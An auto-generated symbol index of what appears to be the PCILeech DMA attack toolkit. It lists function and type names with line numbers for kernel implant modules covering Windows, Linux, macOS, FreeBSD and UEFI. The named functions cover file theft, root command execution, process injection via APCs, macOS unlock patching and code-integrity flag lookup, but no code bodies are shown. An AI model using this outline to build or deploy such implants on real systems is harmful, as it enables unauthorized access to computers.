function vfs_initialize_and_mount_displayinfo (line 717) | void vfs_initialize_and_mount_displayinfo()
function VOID (line 813) | VOID ActionUnMount()
function VOID (line 818) | VOID ActionMount()
FILE: pcileech/vfs.h
type VFS_RESULT_FILEINFO (line 20) | typedef struct tdVFS_RESULT_FILEINFO {
FILE: pcileech/vfslist.c
type VFSLIST_CONTEXT (line 10) | typedef struct tdVFSLIST_CONTEXT {
type VFSLIST_DIRECTORY (line 25) | typedef struct tdVFSLIST_DIRECTORY {
type VFSLISTOB_DIRECTORY (line 32) | typedef struct tdVFSLISTOB_DIRECTORY {
function VOID (line 42) | VOID VfsList_CallbackCleanup_ObDirectory(PVFSLISTOB_DIRECTORY pObDir)
function VOID (line 54) | VOID VfsList_AddDirectoryFileInternal(_Inout_ PVFSLIST_DIRECTORY pFileLi...
function VOID (line 85) | VOID VfsList_AddFile(_Inout_ HANDLE hFileList, _In_ LPCSTR uszName, _In_...
function VOID (line 102) | VOID VfsList_AddDirectory(_Inout_ HANDLE hFileList, _In_ LPCSTR uszName,...
function PVFSLISTOB_DIRECTORY (line 125) | PVFSLISTOB_DIRECTORY VfsList_GetDirectory(_In_ LPSTR uszPath)
function BOOL (line 176) | BOOL VfsList_ListDirectory(_In_ LPSTR uszPath, _In_opt_ PVOID ctx, _In_o...
function VfsList_GetSingle (line 203) | _Success_(return)
function VOID (line 232) | VOID VfsList_Clear(_In_ LPSTR uszPath)
function VfsList_EntryUtoW (line 242) | _Success_(return)
function VfsList_GetSingleW (line 263) | _Success_(return)
function BOOL (line 282) | BOOL VfsList_ListDirectoryW(_In_ LPWSTR wszPath, _In_opt_ PVOID ctx, _In...
function BOOL (line 316) | BOOL VfsList_ValidEntry(_In_opt_ VMM_HANDLE H, _Inout_ PQWORD qwContext,...
function VfsList_Close (line 326) | void VfsList_Close()
function VfsList_Initialize (line 343) | _Success_(return)
FILE: pcileech/vfslist.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type VFS_ENTRY (line 17) | typedef struct tdVFS_ENTRY {
type BOOL (line 84) | typedef BOOL(*VFS_LIST_U_PFN)(_In_ LPSTR uszPath, _Inout_ PVMMDLL_VFS_F...
FILE: pcileech/vmmx.c
function VOID (line 14) | VOID Vmmx_Close()
function Vmmx_Initialize (line 29) | _Success_(return)
FILE: pcileech_shellcode/fbsdx64_common.h
type VOID (line 12) | typedef void VOID, *PVOID;
type BOOL (line 13) | typedef int BOOL, *PBOOL;
type BYTE (line 14) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 15) | typedef char CHAR, *PCHAR;
type WORD (line 16) | typedef unsigned short WORD, *PWORD;
type DWORD (line 17) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 18) | typedef unsigned __int64 QWORD, *PQWORD;
type STATUS (line 20) | typedef unsigned long STATUS;
type KMDDATA (line 32) | typedef struct tdKMDDATA {
FILE: pcileech_shellcode/fbsdx64_filepull.c
type uio_seg (line 25) | enum uio_seg {
type uio_rw (line 31) | enum uio_rw {
type vattr (line 36) | struct vattr {
type vop_getattr_args (line 42) | struct vop_getattr_args {
type vop_unlock_args (line 49) | struct vop_unlock_args {
type nameidata (line 55) | struct nameidata {
type FN2 (line 61) | typedef struct tdFN2 {
function BOOL (line 74) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function QWORD (line 93) | QWORD GetFileSize(PFN2 pfn2, QWORD vnode)
function VOID (line 107) | VOID VOP_UNLOCK(PFN2 pfn2, QWORD vnode, QWORD flags)
function VOID (line 116) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/fbsdx64_stage3_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type tdvm_page_t (line 26) | struct tdvm_page_t {
type PHYSICAL_MEMORY_RANGE (line 31) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type PHYSICAL_MEMORY_RANGE_BSD (line 36) | typedef struct tdPHYSICAL_MEMORY_RANGE_BSD {
type FNBSD (line 41) | typedef struct tdFNBSD { // function pointers to BSD functions and structs
type KMDDATA (line 60) | typedef struct tdKMDDATA {
function BOOL (line 117) | BOOL SetMemoryRanges(PKMDDATA pk)
function VOID (line 147) | VOID stage3_c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_common.c
function BOOL (line 9) | BOOL _WriteLargeOutput_WaitForAck(PKMDDATA pk)
function BOOL (line 19) | BOOL WriteLargeOutput_WaitNext(PKMDDATA pk)
function VOID (line 29) | VOID WriteLargeOutput_Finish(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_common.h
type VOID (line 12) | typedef void VOID, *PVOID;
type BOOL (line 13) | typedef int BOOL, *PBOOL;
type BYTE (line 14) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 15) | typedef char CHAR, *PCHAR;
type WCHAR (line 16) | typedef unsigned short WCHAR, *PWCHAR;
type WORD (line 17) | typedef unsigned short WORD, *PWORD;
type DWORD (line 18) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 19) | typedef unsigned __int64 QWORD, *PQWORD;
type STATUS (line 21) | typedef unsigned long STATUS;
type FNLX (line 37) | typedef struct tdFNLX { // VOID definitions for LINUX functions (used in...
type KMDDATA (line 66) | typedef struct tdKMDDATA {
type EXEC_IO (line 106) | typedef struct tdEXEC_IO {
FILE: pcileech_shellcode/lx64_exec_root.c
type FN2 (line 12) | typedef struct tdFN2 {
function BOOL (line 17) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 24) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_filedelete.c
type FN2 (line 16) | typedef struct tdFN2 {
type FN3 (line 21) | typedef struct tdFN3 {
function BOOL (line 28) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function BOOL (line 37) | BOOL LookupFunctions3(PKMDDATA pk, PFN3 pfn3)
function VOID (line 53) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_filepull.c
type FN2 (line 19) | typedef struct tdFN2 {
function BOOL (line 27) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 42) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_filepush.c
type FN2 (line 21) | typedef struct tdFN2 {
function BOOL (line 29) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 44) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_stage3_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type PHYSICAL_MEMORY_RANGE (line 30) | typedef struct _PHYSICAL_MEMORY_RANGE {
type TIMEVAL (line 35) | typedef struct _TIMEVAL {
type FNLX (line 40) | typedef struct tdFNLX { // VOID definitions for LINUX functions (used in...
type KMDDATA (line 79) | typedef struct tdKMDDATA {
function BOOL (line 132) | BOOL LookupFunctionsEx(PKMDDATA pk)
function VOID (line 154) | VOID FreePageBuffer(PKMDDATA pk, QWORD pg, QWORD order)
function VOID (line 185) | VOID FreeDmaLargeBuffer(PKMDDATA pk)
function QWORD (line 200) | QWORD AllocateDmaLargeBuffer(PKMDDATA pk)
function VOID (line 227) | VOID FreePageLargeBuffer(PKMDDATA pk)
function QWORD (line 239) | QWORD AllocatePageLargeBuffer(PKMDDATA pk)
function VOID (line 264) | VOID FreeLargeBuffer(PKMDDATA pk)
function QWORD (line 275) | QWORD AllocateLargeBuffer(PKMDDATA pk)
function VOID (line 290) | VOID TryMigrate_FreeOriginalBuffer(PKMDDATA pk)
function QWORD (line 307) | QWORD TryMigrate_AllocateMemoryDmaSmall(PKMDDATA pk, QWORD *paDMA)
function QWORD (line 328) | QWORD stage3_c_TryMigrateEntryPoint(PKMDDATA pk)
function VOID (line 384) | VOID stage3_c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_vfs.c
type VFS_OPERATION (line 36) | typedef struct tdVFS_OPERATION {
type VFS_RESULT_FILEINFO (line 47) | typedef struct tdVFS_RESULT_FILEINFO {
type timespec (line 85) | struct timespec {
type kstat_4_10 (line 91) | struct kstat_4_10 {
type kstat_4_11 (line 109) | struct kstat_4_11 {
type FN2 (line 134) | typedef struct tdFN2 {
type DIR_CONTEXT (line 159) | typedef struct tdDIR_CONTEXT {
type DIR_CONTEXT_EXTENDED (line 164) | typedef struct tdDIR_CONTEXT_EXTENDED {
function BOOL (line 172) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VfsList_CallbackIterateDir (line 205) | static int VfsList_CallbackIterateDir(PDIR_CONTEXT_EXTENDED ctx, const c...
function QWORD (line 242) | QWORD UnixToWindowsFiletime(QWORD tv) {
function VOID (line 249) | VOID VfsList_SetSizeTime(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 307) | STATUS VfsList(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 334) | STATUS VfsDelete(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 350) | STATUS VfsRead(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 362) | STATUS VfsWrite(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 378) | STATUS VfsCreate(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function VOID (line 390) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_common.c
type PE_state_t (line 14) | typedef struct PE_state {
type EFI_MEMORY_RANGE (line 39) | typedef struct tdEFI_MEMORY_RANGE {
type BOOT_ARGS (line 50) | typedef struct tdBOOT_ARGS {
function BOOL (line 64) | BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQW...
function QWORD (line 89) | QWORD MapMemoryPhysical(PKMDDATA pk, QWORD qwMemoryBase)
function BOOL (line 98) | BOOL IsRangeInPhysicalMap(PBYTE pbMemoryRanges, QWORD cbMemoryRanges, QW...
function QWORD (line 110) | QWORD GetMemoryPhysicalMaxAddress(PBYTE pbMemoryRanges, QWORD cbMemoryRa...
function BOOL (line 118) | BOOL _WriteLargeOutput_WaitForAck(PKMDDATA pk)
function BOOL (line 128) | BOOL WriteLargeOutput_WaitNext(PKMDDATA pk)
function VOID (line 138) | VOID WriteLargeOutput_Finish(PKMDDATA pk)
FILE: pcileech_shellcode/macos_common.h
type VOID (line 12) | typedef void VOID, *PVOID;
type BOOL (line 13) | typedef int BOOL, *PBOOL;
type BYTE (line 14) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 15) | typedef char CHAR, *PCHAR;
type WCHAR (line 16) | typedef unsigned short WCHAR, *PWCHAR;
type WORD (line 17) | typedef unsigned short WORD, *PWORD;
type DWORD (line 18) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 19) | typedef unsigned __int64 QWORD, *PQWORD;
type STATUS (line 27) | typedef unsigned long STATUS;
type PHYSICAL_MEMORY_RANGE (line 42) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type FNMACOS (line 47) | typedef struct tdFNMACOS { // function pointers to macOS functions (used...
type KMDDATA (line 68) | typedef struct tdKMDDATA {
type EXEC_IO (line 105) | typedef struct tdEXEC_IO {
FILE: pcileech_shellcode/macos_filedelete.c
type FN2 (line 19) | typedef struct tdFN2 {
type COMPONENTNAME (line 35) | typedef struct componentname {
function BOOL (line 64) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 99) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_filepull.c
type FN2 (line 17) | typedef struct tdFN2 {
function BOOL (line 28) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 45) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_filepush.c
type FN2 (line 17) | typedef struct tdFN2 {
function BOOL (line 27) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 43) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_stage3_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type PE_state_t (line 24) | typedef struct PE_state {
type EFI_MEMORY_RANGE (line 49) | typedef struct tdEFI_MEMORY_RANGE {
type BOOT_ARGS (line 60) | typedef struct tdBOOT_ARGS {
type PHYSICAL_MEMORY_RANGE (line 83) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type FNMACOS (line 88) | typedef struct tdFNMACOS { // function pointers to macOS functions (used...
type KMDDATA (line 111) | typedef struct tdKMDDATA {
function BOOL (line 160) | BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQW...
function VOID (line 198) | VOID stage3_c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_unlock.c
type SIGNATURE_CHUNK (line 16) | typedef struct tdSignatureChunk {
type SIGNATURE (line 22) | typedef struct tdSignature {
function BOOL (line 32) | BOOL Unlock_FindAndPatch(PKMDDATA pk, PBYTE pbPage, PSIGNATURE pSignatur...
function STATUS (line 52) | STATUS Unlock(PKMDDATA pk)
function VOID (line 101) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_vfs.c
type VFS_OPERATION (line 36) | typedef struct tdVFS_OPERATION {
type VFS_RESULT_FILEINFO (line 47) | typedef struct tdVFS_RESULT_FILEINFO {
type attrlist (line 88) | struct attrlist {
type attribute_set_t (line 98) | typedef struct attribute_set {
type attrreference_t (line 107) | typedef struct attrreference {
type timespec (line 112) | struct timespec {
type vtype (line 117) | enum vtype {
type vnode_attr (line 133) | struct vnode_attr {
type FN2 (line 144) | typedef struct tdFN2 {
function BOOL (line 160) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function QWORD (line 182) | QWORD UnixToWindowsFiletime(QWORD tv) {
function STATUS (line 189) | STATUS VfsList(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 302) | STATUS VfsDelete(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 310) | STATUS VfsRead(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 336) | STATUS VfsWrite(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 367) | STATUS VfsCreate(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function VOID (line 382) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/uefi_common.h
type VOID (line 14) | typedef void VOID, *PVOID;
type BOOL (line 15) | typedef int BOOL, *PBOOL;
type BYTE (line 16) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 17) | typedef char CHAR, *PCHAR, *LPSTR;
type WCHAR (line 18) | typedef unsigned short WCHAR, *PWCHAR;
type WORD (line 19) | typedef unsigned short WORD, *PWORD;
type DWORD (line 20) | typedef unsigned long DWORD, *PDWORD, LONG;
type __int64 (line 21) | typedef __int64 LONGLONG;
type QWORD (line 22) | typedef unsigned __int64 QWORD, *PQWORD, ULONGLONG;
type STATUS (line 24) | typedef unsigned long STATUS;
type KMDDATA (line 40) | typedef struct tdKMDDATA {
type EFI_GUID (line 77) | typedef struct _EFI_GUID {
type EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL (line 144) | typedef struct _EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL {
type SIMPLE_TEXT_OUTPUT_MODE (line 153) | typedef struct {
type EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL (line 163) | typedef struct _EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL {
type IMAGE_DOS_HEADER (line 186) | typedef struct _IMAGE_DOS_HEADER {
type IMAGE_EXPORT_DIRECTORY (line 208) | typedef struct _IMAGE_EXPORT_DIRECTORY {
type IMAGE_FILE_HEADER (line 222) | typedef struct _IMAGE_FILE_HEADER {
type IMAGE_DATA_DIRECTORY (line 232) | typedef struct _IMAGE_DATA_DIRECTORY {
type IMAGE_OPTIONAL_HEADER64 (line 237) | typedef struct _IMAGE_OPTIONAL_HEADER64 {
type IMAGE_NT_HEADERS64 (line 270) | typedef struct _IMAGE_NT_HEADERS64 {
type IMAGE_SECTION_HEADER (line 278) | typedef struct _IMAGE_SECTION_HEADER {
FILE: pcileech_shellcode/uefi_kmd_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type EFI_MEMORY_DESCRIPTOR (line 43) | typedef struct tdEFI_MEMORY_DESCRIPTOR {
type PHYSICAL_MEMORY_RANGE (line 93) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type KMDDATA (line 106) | typedef struct tdKMDDATA {
function BOOL (line 155) | BOOL GetMemoryMapFromEfi(PKMDDATA pk)
function VOID (line 226) | VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
FILE: pcileech_shellcode/uefi_textout.c
function VOID (line 14) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/uefi_winload_ntos_kmd_c.c
type QWORD (line 16) | typedef unsigned __int64 QWORD, *PQWORD;
type __int64 (line 17) | typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
type CLIENT_ID (line 21) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 25) | typedef CLIENT_ID *PCLIENT_ID;
type _IRQL_requires_same_ (line 27) | typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE)
type KSTART_ROUTINE (line 30) | typedef KSTART_ROUTINE *PKSTART_ROUTINE;
type UNICODE_STRING (line 32) | typedef struct _UNICODE_STRING {
type UNICODE_STRING (line 37) | typedef UNICODE_STRING *PUNICODE_STRING;
type OBJECT_ATTRIBUTES (line 39) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_ATTRIBUTES (line 47) | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
type CONST (line 48) | typedef CONST OBJECT_ATTRIBUTES
type MEMORY_CACHING_TYPE (line 50) | typedef enum _MEMORY_CACHING_TYPE {
type PHYSICAL_MEMORY_RANGE (line 60) | typedef struct _PHYSICAL_MEMORY_RANGE {
type MODE (line 65) | typedef enum _MODE {
type NTOS (line 91) | typedef struct tdNTOS {
type KMDDATA (line 155) | typedef struct tdKMDDATA {
function DWORD (line 190) | DWORD HashROR13A(_In_ LPCSTR sz)
function QWORD (line 207) | QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
function VOID (line 255) | VOID stage3_c_MainCommandLoop(PKMDDATA pk)
function VOID (line 357) | VOID c_EntryPoint_Thread(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase)
function VOID (line 406) | VOID c_EntryPoint(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase, QWORD qwCR3)
FILE: pcileech_shellcode/uefi_winload_ntos_patch.c
function DWORD (line 29) | DWORD HashROR13A(LPSTR sz)
function QWORD (line 46) | QWORD PEGetProcAddressH(QWORD hModule, DWORD dwProcNameH)
function BOOL (line 73) | BOOL PEGetSection(QWORD hModule, QWORD qwSzSection, PDWORD pdwSectionBas...
function QWORD (line 102) | QWORD FindNtoskrnl()
function QWORD (line 135) | QWORD FindCodeCave(QWORD hModule, QWORD qwSize)
function VOID (line 167) | VOID GetData_KMD(PBYTE *ppb, PDWORD pcb)
function VOID (line 303) | VOID GetData_VFS(PBYTE *ppb, PDWORD pcb)
function VOID (line 520) | VOID GetData_PSCMD_KERNEL(PBYTE *ppb, PDWORD pcb)
function VOID (line 739) | VOID GetData_PSCMD_USER(PBYTE *ppb, PDWORD pcb)
function VOID (line 868) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/wx64_common.c
function DWORD (line 10) | DWORD HashROR13A(_In_ LPCSTR sz)
function QWORD (line 21) | QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
function QWORD (line 49) | QWORD KernelGetModuleBase(_In_ PKERNEL_FUNCTIONS fnk, _In_ LPSTR szModul...
function VOID (line 71) | VOID InitializeKernelFunctions(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNC...
function DWORD (line 105) | DWORD PEGetImageSize(_In_ QWORD hModule)
function VOID (line 114) | VOID CommonSleep(_In_ PKERNEL_FUNCTIONS fnk, _In_ DWORD ms)
function BOOL (line 120) | BOOL _WriteLargeOutput_WaitForAck(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKMDD...
function BOOL (line 130) | BOOL WriteLargeOutput_WaitNext(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKMDDATA...
function VOID (line 140) | VOID WriteLargeOutput_Finish(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_common.h
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type UCHAR (line 15) | typedef UCHAR KIRQL;
type KIRQL (line 16) | typedef KIRQL *PKIRQL;
type _EPROCESS (line 17) | struct _EPROCESS
type _ETHREAD (line 18) | struct _ETHREAD
type KMDDATA (line 34) | typedef struct tdKMDDATA {
type EXEC_IO (line 71) | typedef struct tdEXEC_IO {
type SYSTEM_MODULE_INFORMATION_ENTRY (line 89) | typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
type SYSTEM_MODULE_INFORMATION (line 104) | typedef struct _SYSTEM_MODULE_INFORMATION {
type UNICODE_STRING (line 110) | typedef struct _UNICODE_STRING {
type ANSI_STRING (line 116) | typedef struct _ANSI_STRING {
type IO_STATUS_BLOCK (line 122) | typedef struct _IO_STATUS_BLOCK {
type OBJECT_ATTRIBUTES (line 130) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_ATTRIBUTES (line 138) | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
type SYSTEM_INFORMATION_CLASS (line 149) | typedef enum _SYSTEM_INFORMATION_CLASS {
type CCHAR (line 154) | typedef CCHAR KPROCESSOR_MODE;
type MODE (line 156) | typedef enum _MODE {
type MEMORY_CACHING_TYPE (line 162) | typedef enum _MEMORY_CACHING_TYPE {
type KERNEL_FUNCTIONS (line 174) | typedef struct tdKERNEL_FUNCTIONS {
FILE: pcileech_shellcode/wx64_driverinfo.c
function VOID (line 15) | VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk)
function VOID (line 48) | VOID ActionDetails(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk)
function VOID (line 79) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_driverload_svc.c
type KERNEL_FUNCTIONS2 (line 21) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 48) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function NTSTATUS (line 67) | NTSTATUS DriverRegGetImagePath(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS ...
function LPWSTR (line 96) | LPWSTR DriverRegGetImageNameFromPath(LPWSTR wszSrc)
function VOID (line 111) | VOID DriverRegSetServiceKeys(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fn...
function NTSTATUS (line 134) | NTSTATUS DriverRegCreateService(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS...
function QWORD (line 166) | QWORD GetAddr_g_CiEnabled(QWORD qwAddrModuleCi)
function NTSTATUS (line 196) | NTSTATUS DriverLoadByServiceName(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTION...
function NTSTATUS (line 212) | NTSTATUS DriverLoadByImagePath(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS ...
function VOID (line 229) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_driverunload.c
function VOID (line 17) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_exec_user_c.c
type QWORD (line 31) | typedef unsigned __int64 QWORD, *PQWORD;
type USERSHELL_BUFFER_IO (line 36) | typedef struct tUSERSHELLBUFFERIO {
type USERSHELL_CONFIG (line 44) | typedef struct tdUserShellConfig {
type USERSHELL_FUNCTIONS (line 60) | typedef struct tdUserShellFunctions {
type USERSHELL_DATA (line 117) | typedef struct tdUserShellData {
function DWORD (line 131) | DWORD HashROR13A(_In_ LPCSTR sz)
function PVOID (line 142) | PVOID PEGetProcAddressH(_In_ HMODULE hModuleIn, _In_ DWORD dwProcNameH)
function VOID (line 166) | VOID UserShellInitializeFunctions(_In_ HMODULE hModuleKernel32, _Out_ PU...
function BOOL (line 184) | BOOL UserShellIsProcessRunning(PUSERSHELL_DATA pd)
function VOID (line 190) | VOID UserShellCleanup(PUSERSHELL_DATA pd)
function BOOL (line 207) | BOOL UserShellExec(_Inout_ PUSERSHELL_DATA pd)
function VOID (line 231) | VOID UserShellThreadWriter(PUSERSHELL_DATA pd)
function VOID (line 257) | VOID UserShellThreadReader(PUSERSHELL_DATA pd)
function VOID (line 280) | VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
FILE: pcileech_shellcode/wx64_filepull.c
function VOID (line 22) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_filepush.c
function VOID (line 21) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pagesignature.c
type SIGNATUREPTE (line 14) | typedef struct tdSignaturePTE {
type DRIVER_EXTENSION (line 22) | typedef struct _DRIVER_EXTENSION {
type DRIVER_OBJECT (line 29) | typedef struct _DRIVER_OBJECT {
type KERNEL_FUNCTIONS2 (line 53) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 66) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function QWORD (line 76) | QWORD GetPTE(_In_ PKERNEL_FUNCTIONS fnk, _In_ QWORD qwVA, _Out_opt_ QWOR...
function VOID (line 116) | VOID PageTable_CreateSignature(_In_ PKERNEL_FUNCTIONS fnk, _In_ QWORD qw...
function PVOID (line 143) | PVOID PageTable_GetAddrMajorFunction(_Inout_ PKMDDATA pk, _In_ PKERNEL_F...
function VOID (line 157) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pscreate.c
type LOCK_OPERATION (line 29) | typedef enum _LOCK_OPERATION {
type MM_PAGE_PRIORITY (line 35) | typedef enum _MM_PAGE_PRIORITY {
type MEMORY_CACHING_TYPE_ORIG (line 41) | typedef enum _MEMORY_CACHING_TYPE_ORIG {
type KAPC_ENVIRONMENT (line 45) | typedef enum _KAPC_ENVIRONMENT {
type KAPC_STATE (line 52) | typedef struct _KAPC_STATE {
type KAPC (line 66) | typedef struct _KAPC {
type CLIENT_ID (line 83) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 87) | typedef CLIENT_ID *PCLIENT_ID;
type SYSTEM_THREAD_INFORMATION (line 89) | typedef struct SYSTEM_THREAD_INFORMATION {
type SYSTEM_PROCESS_INFORMATION (line 103) | typedef struct _SYSTEM_PROCESS_INFORMATION {
type USERSHELL_CONFIG (line 119) | typedef struct tdUserShellConfig {
type KERNEL_FUNCTIONS2 (line 127) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 225) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function VOID (line 255) | VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWO...
function VOID (line 382) | VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWO...
function NTSTATUS (line 393) | NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS ...
function QWORD (line 424) | QWORD SetupConsoleBufferUserMode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTION...
function VOID (line 464) | VOID KernelApcRoutine(_In_ struct _KAPC *Apc, _Inout_ PVOID *NormalRouti...
function VOID (line 483) | VOID ActionWaitForExit(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk)
function PKAPC_STATE (line 504) | PKAPC_STATE GetKApcState(_In_ PEPROCESS pEProcess, _In_ PETHREAD pEThread)
